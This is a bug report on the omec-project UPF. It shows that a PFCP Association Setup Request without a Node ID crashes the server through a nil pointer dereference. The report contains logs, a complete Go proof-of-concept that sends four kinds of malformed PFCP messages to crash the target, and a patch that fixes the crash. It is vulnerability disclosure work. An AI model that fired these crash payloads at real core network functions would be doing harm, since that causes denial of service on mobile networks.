[Bugs]UPF crash caused by on Association Setup Request without NodeID

# Describe the bug
When the UPF receives a PFCP Association Setup Request that is missing the Node ID, handleAssociationSetupRequest directly calls IE.NodeID() on the empty IE. This results in a nil pointer dereference and causes a crash, leading to a DoS.

# Release Information
Component: UPF (pfcpiface)
Version: upf-epc-pfcpiface:2.1.2-dev

# Logs
```
docker logs a73b08878dbc
2025-11-10T13:12:38.576Z        INFO    pfcpiface/main.go:33    setting log level to: info      {"component": "UPF", "category": "Init"}
2025-11-10T13:12:38.576Z        INFO    logger/logger.go:59     set log level: info     {"component": "UPF", "category": "Init"}
2025-11-10T13:12:38.576Z        INFO    pfcpiface/main.go:36    {Mode:sim AccessIface:{IfName:ens803f2} CoreIface:{IfName:ens803f3} CPIface:{Peers:[148.162.12.214] UseFQDN:false NodeID: HTTPPort:8080 Dnn:internet EnableUeIPAlloc:false UEIPPool:10.250.0.0/16} EnableGtpuPathMonitoring:false EnableFlowMeasure:false SimInfo:{MaxSessions:50000 StartUEIP:16.0.0.1 StartENBIP:11.1.1.129 StartAUPFIP:13.1.1.199 N6AppIP:6.6.6.6 N9AppIP:9.9.9.9 StartN3TEID:0x30000000 StartN9TEID:0x90000000 UplinkMBR:500000 DownlinkMBR:1000000 UplinkGBR:50000 DownlinkGBR:100000} ConnTimeout:0 ReadTimeout:15 EnableNotifyBess:false EnableEndMarker:false NotifySockAddr: EndMarkerSockAddr: LogLevel:info QciQosConfig:[{QCI:0 CBS:50000 PBS:50000 EBS:50000 BurstDurationMs:10 SchedulingPriority:7} {QCI:9 CBS:2048 PBS:2048 EBS:2048 BurstDurationMs:0 SchedulingPriority:6} {QCI:8 CBS:2048 PBS:2048 EBS:2048 BurstDurationMs:0 SchedulingPriority:5}] SliceMeterConfig:{N6RateBps:500000000 N6BurstBytes:625000 N3RateBps:500000000 N3BurstBytes:625000} MaxReqRetries:5 RespTimeout:2s EnableHBTimer:false HeartBeatInterval: N4Addr:}       {"component": "UPF", "category": "Init"}
2025-11-10T13:12:38.576Z        ERROR   pfcpiface/bess.go:775   SetUpfInfo bess {"component": "UPF", "category": "BESS"}
2025-11-10T13:12:38.576Z        ERROR   pfcpiface/bess.go:779   bessIP localhost:10514  {"component": "UPF", "category": "BESS"}
2025-11-10T13:12:38.594Z        INFO    pfcpiface/node.go:84    listening for new PFCP connections on [::]:8805 {"component": "UPF", "category": "Pfcp"}
2025-11-10T13:12:38.594Z        INFO    pfcpiface/node.go:73    Establishing PFCP Conn with CP node. SPGWC/SMF host: 148.162.12.214, CP node: 148.162.12.214   {"component": "UPF", "category": "Pfcp"}
2025-11-10T13:12:38.594Z        INFO    pfcpiface/conn.go:121   created PFCPConn from: 172.17.0.3:8805 to: 148.162.12.214:8805{"component": "UPF", "category": "Pfcp"}
2025-11-10T13:12:38.594Z        INFO    pfcpiface/messages_conn.go:99   association Setup with DNN: internet    {"component": "UPF", "category": "Pfcp"}
2025-11-10T13:12:50.598Z        INFO    pfcpiface/node.go:129   removed connection to 148.162.12.214:8805       {"component": "UPF", "category": "Pfcp"}
2025-11-10T13:12:50.598Z        INFO    pfcpiface/conn.go:256   shutdown complete for 148.162.12.214:8805       {"component": "UPF", "category": "Pfcp"}
2025-11-10T13:17:29.054Z        INFO    pfcpiface/conn.go:121   created PFCPConn from: 172.17.0.3:8805 to: 172.17.0.1:32779   {"component": "UPF", "category": "Pfcp"}
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x968e82]

goroutine 13 [running]:
github.com/wmnsk/go-pfcp/ie.(*IE).NodeID(0x0)
        /go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.24/ie/node-id.go:78 +0x22
github.com/omec-project/upf-epc/pfcpiface.(*PFCPConn).handleAssociationSetupRequest(0xc0004537a0, {0xdbf100, 0xc0000001c0})
        /pfcpiface/pfcpiface/messages_conn.go:138 +0x99
github.com/omec-project/upf-epc/pfcpiface.(*PFCPConn).HandlePFCPMsg(0xc0004537a0, {0xc0000c5800, 0x10, 0x400})
        /pfcpiface/pfcpiface/messages.go:81 +0x30d
github.com/omec-project/upf-epc/pfcpiface.(*PFCPNode).NewPFCPConn(0xc000494300, {0xc000013f40?, 0xb33c80?}, {0xc00047e0b0, 0x10}, {0xc0000c5800, 0x10, 0x400})
        /pfcpiface/pfcpiface/conn.go:144 +0x598
github.com/omec-project/upf-epc/pfcpiface.(*PFCPNode).handleNewPeers(0xc000494300)
        /pfcpiface/pfcpiface/node.go:108 +0x1bd
created by github.com/omec-project/upf-epc/pfcpiface.(*PFCPNode).Serve in goroutine 1
        /pfcpiface/pfcpiface/node.go:114 +0x67
```
# Steps to reproduce the behavior:

1. Start a new go project inside a new folder and create a main.go and paste the code below:
2.  Init Project `go mod init poc` 
```
package main

import (
    "errors"
    "flag"
    "fmt"
    "log"
    "net"
    "strings"
    "time"

    "github.com/wmnsk/go-pfcp/ie"
    "github.com/wmnsk/go-pfcp/message"
)

const (
    modeAssocMissingNodeID       = "assoc-missing-nodeid"
    modeSessionMissingNodeID     = "session-missing-nodeid"
    modeSessionReportEmptyCause  = "sessionreport-empty-cause"
    modeSessionInvalidApply      = "session-invalid-applyaction"
    defaultCPSEID                = 0x1111222233334444
    defaultSessionRemoteSEID     = 0x2222333344445555
    defaultSessionReportRemote   = 0x3333444455556666
    heartbeatResponseBufferSize  = 4096
    defaultWaitForResponse       = 5 * time.Second
    defaultAssociationRetrySleep = 200 * time.Millisecond
)

type seqGenerator struct {
    val uint32
}

func (g *seqGenerator) Next() uint32 {
    g.val++
    if g.val == 0 || g.val > 0xFFFFFF {
        g.val = 1
    }
    return g.val
}

func forcePFCPv1(pkt []byte) {
    if len(pkt) > 0 {
        pkt[0] = (1 << 5) | (pkt[0] & 0x1F)
    }
}

func startReceiver(conn *net.UDPConn) (chan message.Message, chan error, func()) {
    msgCh := make(chan message.Message, 16)
    errCh := make(chan error, 1)
    stop := make(chan struct{})

    go func() {
        defer close(msgCh)
        defer close(errCh)

        buf := make([]byte, heartbeatResponseBufferSize)
        for {
            conn.SetReadDeadline(time.Now().Add(1 * time.Second))
            n, _, err := conn.ReadFromUDP(buf)
            if ne, ok := err.(net.Error); ok && ne.Timeout() {
                select {
                case <-stop:
                    return
                default:
                }
                continue
            }
            if err != nil {
                select {
                case errCh <- err:
                default:
                }
                return
            }

            payload := make([]byte, n)
            copy(payload, buf[:n])
            msg, err := message.Parse(payload)
            if err != nil {
                log.Printf("[rx] failed to parse PFCP message: %v", err)
                continue
            }

            switch msgTyped := msg.(type) {
            case *message.HeartbeatRequest:
                seq := msgTyped.Sequence()
                rsp := message.NewHeartbeatResponse(seq, ie.NewRecoveryTimeStamp(time.Now()))
                raw, err := rsp.Marshal()
                if err != nil {
                    log.Printf("[rx] failed to marshal Heartbeat Response: %v", err)
                    continue
                }
                forcePFCPv1(raw)
                if _, err := conn.Write(raw); err != nil {
                    log.Printf("[rx] failed to send Heartbeat Response: %v", err)
                } else {
                    log.Printf("[rx] ← Heartbeat Request (seq=%d) → responded", seq)
                }
            default:
                select {
                case msgCh <- msg:
                    log.Printf("[rx] ← %s (type=%d, seq=%d)", msg.MessageTypeName(), msg.MessageType(), msg.Sequence())
                default:
                    log.Printf("[rx] dropping %s: channel full", msg.MessageTypeName())
                }
            }

            select {
            case <-stop:
                return
            default:
            }
        }
    }()

    cancel := func() {
        close(stop)
    }

    return msgCh, errCh, cancel
}

func waitForMessage(msgCh <-chan message.Message, errCh <-chan error, timeout time.Duration, match func(message.Message) bool, description string) (message.Message, error) {
    timer := time.NewTimer(timeout)
    defer timer.Stop()

    for {
        select {
        case <-timer.C:
            return nil, fmt.Errorf("timeout waiting for %s", description)
        case err, ok := <-errCh:
            if ok && err != nil {
                return nil, fmt.Errorf("receiver error: %w", err)
            }
        case msg, ok := <-msgCh:
            if !ok {
                return nil, fmt.Errorf("receiver closed while waiting for %s", description)
            }
            if match(msg) {
                return msg, nil
            }
            log.Printf("[wait] ignoring unexpected message: %s (type=%d, seq=%d)", msg.MessageTypeName(), msg.MessageType(), msg.Sequence())
        }
    }
}

func performAssociation(conn *net.UDPConn, seqGen *seqGenerator, msgCh <-chan message.Message, errCh <-chan error, nodeID string, includeUPFInfo bool) error {
    nodeIE := ie.NewNodeID(nodeID, "", "")
    if nodeIE == nil {
        return errors.New("failed to build NodeID IE – ensure --bind is a valid IP or FQDN")
    }

    ies := []*ie.IE{
        nodeIE,
        ie.NewRecoveryTimeStamp(time.Now()),
    }
    if includeUPFInfo {
        ies = append(ies,
            ie.NewUPFunctionFeatures(0x10, 0x00, 0x00, 0x00),
            ie.NewUserPlaneIPResourceInformation(0x41, 0, nodeID, "", "", ie.SrcInterfaceAccess),
        )
    }

    assocSeq := seqGen.Next()
    req := message.NewAssociationSetupRequest(assocSeq, ies...)

    raw, err := req.Marshal()
    if err != nil {
        return fmt.Errorf("marshal association request: %w", err)
    }
    forcePFCPv1(raw)

    log.Printf("[assoc] → Association Setup Request (seq=%d)", assocSeq)
    if _, err := conn.Write(raw); err != nil {
        return fmt.Errorf("send association request: %w", err)
    }

    _, err = waitForMessage(msgCh, errCh, defaultWaitForResponse, func(m message.Message) bool {
        _, ok := m.(*message.AssociationSetupResponse)
        return ok
    }, "Association Setup Response")
    if err != nil {
        return fmt.Errorf("association failed: %w", err)
    }

    log.Printf("[assoc] Association established; ready for exploit traffic.")
    return nil
}

func sendAssocMissingNodeID(conn *net.UDPConn, seqGen *seqGenerator) error {
    seq := seqGen.Next()
    // Intentionally omit NodeID IE to trigger nil dereference in handleAssociationSetupRequest.
    req := message.NewAssociationSetupRequest(seq,
        ie.NewRecoveryTimeStamp(time.Now()),
    )
    raw, err := req.Marshal()
    if err != nil {
        return fmt.Errorf("marshal malformed association request: %w", err)
    }
    forcePFCPv1(raw)

    log.Printf("[poc] → Malformed Association Setup Request (seq=%d, missing NodeID)", seq)
    _, err = conn.Write(raw)
    return err
}

func sendSessionMissingNodeID(conn *net.UDPConn, seqGen *seqGenerator) error {
    seq := seqGen.Next()
    req := message.NewSessionEstablishmentRequest(0, 0, defaultCPSEID, seq, 0)
    raw, err := req.Marshal()
    if err != nil {
        return fmt.Errorf("marshal malformed session establishment request: %w", err)
    }
    forcePFCPv1(raw)

    log.Printf("[poc] → Session Establishment Request (seq=%d, missing NodeID/CPFSEID)", seq)
    _, err = conn.Write(raw)
    return err
}

func sendSessionReportEmptyCause(conn *net.UDPConn, seqGen *seqGenerator) error {
    seq := seqGen.Next()
    report := message.NewSessionReportResponse(0, 0, defaultSessionReportRemote, seq, 0)
    raw, err := report.Marshal()
    if err != nil {
        return fmt.Errorf("marshal malformed session report response: %w", err)
    }
    forcePFCPv1(raw)

    log.Printf("[poc] → Session Report Response (seq=%d, missing Cause IE)", seq)
    _, err = conn.Write(raw)
    return err
}

func sendSessionInvalidApplyAction(conn *net.UDPConn, seqGen *seqGenerator, localIP net.IP, nodeID string, dnn string) error {
    nodeIE := ie.NewNodeID(nodeID, "", "")
    if nodeIE == nil {
        return errors.New("unable to craft NodeID IE; supply --bind as valid IP or FQDN")
    }

    fseidIE := ie.NewFSEID(defaultCPSEID, localIP, nil)
    if fseidIE == nil {
        return errors.New("failed to craft F-SEID IE")
    }

    pdi := ie.NewPDI(
        ie.NewSourceInterface(ie.SrcInterfaceAccess),
        ie.NewNetworkInstance(dnn),
    )

    createPDR := ie.NewCreatePDR(
        ie.NewPDRID(1),
        ie.NewPrecedence(200),
        pdi,
        ie.NewFARID(1),
    )

    createFAR := ie.NewCreateFAR(
        ie.NewFARID(1),
        // Zero-length ApplyAction to trigger panic at action[0].
        ie.New(ie.ApplyAction, nil),
    )

    req := message.NewSessionEstablishmentRequest(0, 0, defaultCPSEID, seqGen.Next(), 0,
        nodeIE,
        fseidIE,
        createPDR,
        createFAR,
        ie.NewAPNDNN(dnn),
    )

    raw, err := req.Marshal()
    if err != nil {
        return fmt.Errorf("marshal malformed session establishment request (empty ApplyAction): %w", err)
    }
    forcePFCPv1(raw)

    log.Printf("[poc] → Session Establishment Request (seq=%d, zero-length ApplyAction)", req.Sequence())
    _, err = conn.Write(raw)
    return err
}

func main() {
    mode := flag.String("mode", modeAssocMissingNodeID, strings.Join([]string{
        "POC attack mode:",
        fmt.Sprintf("  - %s", modeAssocMissingNodeID),
        fmt.Sprintf("  - %s", modeSessionMissingNodeID),
        fmt.Sprintf("  - %s", modeSessionReportEmptyCause),
        fmt.Sprintf("  - %s", modeSessionInvalidApply),
    }, "\n"))
    host := flag.String("host", "127.0.0.1", "UPF PFCP address")
    port := flag.Int("port", 8805, "UPF PFCP port")
    bind := flag.String("bind", "127.0.0.2", "local source IP (attacker PFCP address)")
    dnn := flag.String("dnn", "internet", "DNN to include when crafting valid PDRs")
    wait := flag.Duration("wait", defaultAssociationRetrySleep, "delay between association and exploit payload")
    flag.Parse()

    remoteAddr, err := net.ResolveUDPAddr("udp", fmt.Sprintf("%s:%d", *host, *port))
    if err != nil {
        log.Fatalf("resolve remote: %v", err)
    }

    localIP := net.ParseIP(*bind)
    if localIP == nil {
        log.Fatalf("invalid bind IP: %s", *bind)
    }
    localAddr := &net.UDPAddr{IP: localIP, Port: 0}

    conn, err := net.DialUDP("udp", localAddr, remoteAddr)
    if err != nil {
        log.Fatalf("dial udp: %v", err)
    }
    defer conn.Close()

    msgCh, errCh, cancel := startReceiver(conn)
    defer cancel()

    seqGen := &seqGenerator{}

    log.Printf("Remote UPF target: %s", remoteAddr.String())
    log.Printf("Local PFCP source: %s", conn.LocalAddr().String())
    log.Printf("Running mode: %s", *mode)
    log.Printf("")

    switch *mode {
    case modeAssocMissingNodeID:
        if err := sendAssocMissingNodeID(conn, seqGen); err != nil {
            log.Fatalf("send malformed association request: %v", err)
        }
    case modeSessionMissingNodeID:
        if err := performAssociation(conn, seqGen, msgCh, errCh, *bind, true); err != nil {
            log.Fatalf("association handshake failed: %v", err)
        }
        time.Sleep(*wait)
        if err := sendSessionMissingNodeID(conn, seqGen); err != nil {
            log.Fatalf("send malformed session establishment request: %v", err)
        }
    case modeSessionReportEmptyCause:
        if err := sendSessionReportEmptyCause(conn, seqGen); err != nil {
            log.Fatalf("send malformed session report response: %v", err)
        }
    case modeSessionInvalidApply:
        if err := performAssociation(conn, seqGen, msgCh, errCh, *bind, true); err != nil {
            log.Fatalf("association handshake failed: %v", err)
        }
        time.Sleep(*wait)
        if err := sendSessionInvalidApplyAction(conn, seqGen, localIP, *bind, *dnn); err != nil {
            log.Fatalf("send malformed session establishment request (empty ApplyAction): %v", err)
        }
    default:
        log.Fatalf("unknown mode: %s", *mode)
    }

    log.Printf("")
    log.Printf("Payload delivered. Observe UPF logs for panic stack traces.")
}

```
3. Download required libraries: `go mod tidy`
4. Run the program with the UPF PFCP server address: `go run ./main.go --mode assoc-missing-nodeid --host  172.17.0.3 --bind 172.17.0.1`

# Expected behavior
For missing/invalid messages, return an Association Setup Response with the cause: Mandatory IE missing.
# Observed behavior
Upon receiving an Association Setup Request lacking the Node ID, the UPF experiences a crash.

--- a/pfcpiface/messages_conn.go
+++ b/pfcpiface/messages_conn.go
@@ -14,6 +14,7 @@ import (
 var errFlowDescAbsent = errors.New("flow description not present")
 var errDatapathDown = errors.New("datapath down")
 var errReqRejected = errors.New("request rejected")
+var errNodeIDMissing = errors.New("mandatory NodeID IE missing")
 
 func (pConn *PFCPConn) sendAssociationRequest() {
 	// Build request message
@@ -135,20 +136,27 @@ func (pConn *PFCPConn) handleAssociationSetupRequest(msg message.Message) (messa
 		return nil, errUnmarshal(errMsgUnexpectedType)
 	}
 
+	// Build response message
+	asres := message.NewAssociationSetupResponse(asreq.SequenceNumber,
+		pConn.associationIEs()...)
+
+	if asreq.NodeID == nil {
+		// Reject requests that omit the mandatory Node ID to avoid nil deref on malformed PFCP messages.
+		asres.Cause = ie.NewCause(ie.CauseMandatoryIEMissing)
+		logger.PfcpLog.Warnln("association Setup Request without NodeID from", addr)
+		return asres, errProcess(errNodeIDMissing)
+	}
+
 	nodeID, err := asreq.NodeID.NodeID()
 	if err != nil {
-		return nil, errUnmarshal(err)
+		asres.Cause = ie.NewCause(ie.CauseMandatoryIEIncorrect)
+		return asres, errUnmarshal(err)
 	}
 
 	ts, err := asreq.RecoveryTimeStamp.RecoveryTimeStamp()
 	if err != nil {
 		return nil, errUnmarshal(err)
 	}
-
-	// Build response message
-	asres := message.NewAssociationSetupResponse(asreq.SequenceNumber,
-		pConn.associationIEs()...)
-
 	if !upf.isConnected() {
 		asres.Cause = ie.NewCause(ie.CauseRequestRejected)
 		return asres, errProcess(errDatapathDown)
@@ -191,6 +199,11 @@ func (pConn *PFCPConn) handleAssociationSetupResponse(msg message.Message) error
 		logger.PfcpLog.Errorln("association Setup Response from", addr,
 			"with Cause:", cause)
 		return errReqRejected
+	}
+
+	if asres.NodeID == nil {
+		// Abort association if peer omits Node ID, matching request-side validation.
+		return errUnmarshal(errNodeIDMissing)
 	}
 
 	nodeID, err := asres.NodeID.NodeID()

